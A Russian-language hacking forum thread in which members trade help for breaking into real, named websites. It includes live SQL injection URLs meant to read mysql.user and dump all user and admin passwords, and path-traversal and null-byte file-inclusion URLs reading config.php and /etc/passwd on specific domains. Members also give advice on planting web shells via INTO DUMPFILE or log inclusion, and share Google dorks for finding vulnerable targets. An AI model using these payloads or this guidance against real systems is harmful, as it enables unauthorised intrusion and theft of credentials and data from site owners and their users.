Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    usergroupid=6

    это группа админов, смотри в таблице user
     
    _________________________
  2. =Zeus=

    =Zeus= Member

    Joined:
    10 Aug 2009
    Messages:
    213
    Likes Received:
    54
    Reputations:
    5
    Привет. Интересует заливка шелла через БД.
    HTML:
    http://www.stpatsfc.com/news.php?id=-2839%20UNION%20SELECT%201,2,3,4,5,6,file_priv%20from%20mysql.user--
    Выдает ошибку:
    SELECT command denied to user 'stpatsf_admin'@'web6.novara.ie' for table 'user'
    Получается, что невозможно выполнить SELECT ... INTO DUMPFILE 'бла-бла', и шелл залить нельзя? Максимум это слить базу?
     
  3. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886

    через SQL запрос залить шелл не получится
     
    _________________________
    1 person likes this.
  4. Nek1t

    Nek1t Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    181
    Likes Received:
    16
    Reputations:
    1
    Эта ошибка означает, что у текущего пользователя БД нет доступа к таблице mysql.user. Тем не менее при этом file_priv может быть Y. Но в данном случае экранируются кавычки, так что INTO DUMPFILE не сработает в любом случаем. MySQL там 5ой версии, слей названия таблиц, поищи админку и т.д.
     
    #17524 Nek1t, 1 Aug 2011
    Last edited: 1 Aug 2011
  5. =Zeus=

    =Zeus= Member

    Joined:
    10 Aug 2009
    Messages:
    213
    Likes Received:
    54
    Reputations:
    5
    Думаю что кавычки это наименьшая из проблем там. Ведь у пользователя нету прав.
    Странно, я почему-то думал, что Magic Quotes можно обойти. Правда опыта у меня не много, пока в основном читаю литературу. Например Bernardo Damele, ведущий разработчик sqlmap, пишет по этому поводу так (http://www.slideshare.net/inquis/sql-injection-not-only-and-11-updated):
     
    1 person likes this.
  6. FoXuk

    FoXuk New Member

    Joined:
    23 Dec 2009
    Messages:
    76
    Likes Received:
    3
    Reputations:
    0
    есть доступ в админку сайта, но не получается залить шелл.
    через менеджер изображений не получается. есть возможность добавлять свои переменные на сайте в виде массива или переменной...
    можно ли какой-нибудь код добавить,чтобы можно было как-то залиться шелл?
     
  7. Pirotexnik

    Pirotexnik Member

    Joined:
    13 Oct 2010
    Messages:
    376
    Likes Received:
    73
    Reputations:
    38
    Если есть доспут к админке - есть доступ к структуре. Можно залить нормальным образом.
     
  8. FoXuk

    FoXuk New Member

    Joined:
    23 Dec 2009
    Messages:
    76
    Likes Received:
    3
    Reputations:
    0
    если бы всё так на деле обстояло. переменные, которые уже забиты указывают в основом как выводить картинку, как показано меню и т.д. в хтмл форме.
     
  9. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    В двойных кавычках(С разрешением RG, или с не экранированием одинарных), или попробовать выйти за пределы переменной.
     
  10. Nek1t

    Nek1t Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    181
    Likes Received:
    16
    Reputations:
    1
    Можно обойти, но INTO DUMPFILE требует именно кавычек и чистый путь без хекса и CHAR().
     
    1 person likes this.
  11. KUKLOVOD2

    KUKLOVOD2 Banned

    Joined:
    12 May 2011
    Messages:
    88
    Likes Received:
    7
    Reputations:
    1
    Есть вопросец.Имеется вот такой вот инклуд:
    Code:
    http://atlanticacorp.com/pages/admin/img_stats.php?file=../../../inf/config.php
    .Но вывод идет только одной строки ( а именно 3).Можно ли выжать что то большее?
     
  12. Nek1t

    Nek1t Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    181
    Likes Received:
    16
    Reputations:
    1
    PHP:
    //if($_SESSION['user_admin']>=$adminRights['stats']) {
        
        
    if(isset($_GET['file']) && !empty($_GET['file'])) {
        
          if(
    file_exists('./cache/'.$_GET['file'])) {
          
            
    $contents file('./cache/'.$_GET['file']);
            
            
    $imgTyp trim($contents[1]);
            
    $imgTitel trim($contents[2]);
            
    $imgValues trim($contents[3]);
            
    $imgStrings trim($contents[4]);
            
            
    $inWerte  unserialize($imgValues);
            
    $inStrings unserialize($imgStrings);
          }
        
        }
    Здесь не инклуд, а локальное урезанное чтение файлов.
    В коде жесткое ограничение, что значения берутся только с 3 строчки. Странно, что проверка на админа закомментирована.
     
  13. KUKLOVOD2

    KUKLOVOD2 Banned

    Joined:
    12 May 2011
    Messages:
    88
    Likes Received:
    7
    Reputations:
    1
    ДАДАДА.Меня тоже удивила, как будто специально багу мастерили в двиге.Тоесть ничего не сделать?А вот нашел сайтец на похожем движке:
    Code:
    http://cwerymt2.ru/index.php?s=../../../../../../../../etc/passwd%00
    Двиг аналогичный, но инклуд пашет (просто видно на том сайте нуль байт не пахал).Чисто дальнейшее развитие событий какое может быть?Как происходит залив шелла через локальный инклуд, если неизвестны пути до access.log ?
     
  14. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Это не инклуд а читалка. Совсем разные понятия.
    Всё, что ты можешь сделать с помощью этой уязвимости - читать 3-ую строчку из файлов.
     
  15. aydin-ka

    aydin-ka Elder - Старейшина

    Joined:
    3 May 2009
    Messages:
    316
    Likes Received:
    98
    Reputations:
    29
    Нашел SQL-инъекцию на сайте...ребята из античата раскрутили её до вывода версии, имя пользователя, таблицы... Напишите как можно из этих данных получить пароли всех пользователей в том числе и админа)))

    Вот SQL-инъекции

    http://www.tnak.am/sub/aforizm.php?act=1&uid=52&let=1/**/and/**/row(1,1)%3E(select/**/count(*),concat(version(),0x3a,floor(rand()*2))/**/x/**/from/**/(select/**/1/**/union/**/select/**/2)a/**/group/**/by/**/x/**/limit/**/1)+--+1
     
  16. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    http://forum.antichat.ru/thread43966.html
     
    _________________________
  17. FoXuk

    FoXuk New Member

    Joined:
    23 Dec 2009
    Messages:
    76
    Likes Received:
    3
    Reputations:
    0
    при входе в админку выдает
     
  18. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    Фатальная ошибка: Класс 'COM' не найден в /www/htdocs/site/custom.php на строке 5
     
    _________________________
  19. foozzi

    foozzi Member

    Joined:
    13 Apr 2010
    Messages:
    195
    Likes Received:
    12
    Reputations:
    5
    как отфильтровать запрос таким образом, мне например надо inurl:index.php?test= но что бы искало по контенту например powered by coolsite
    попробовал такую чушь inurl:index.php?test= intext:powered by coolsite
    не канает :)
    подскажите
     
  20. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    Примерно так:
    Code:
    "Powered by: vBulletin"  inurl:forum42.html
    Советую изучить все поиск. запросы гугла и искать так как тебе надо, а не как он выдаёт.
     
Thread Status:
Not open for further replies.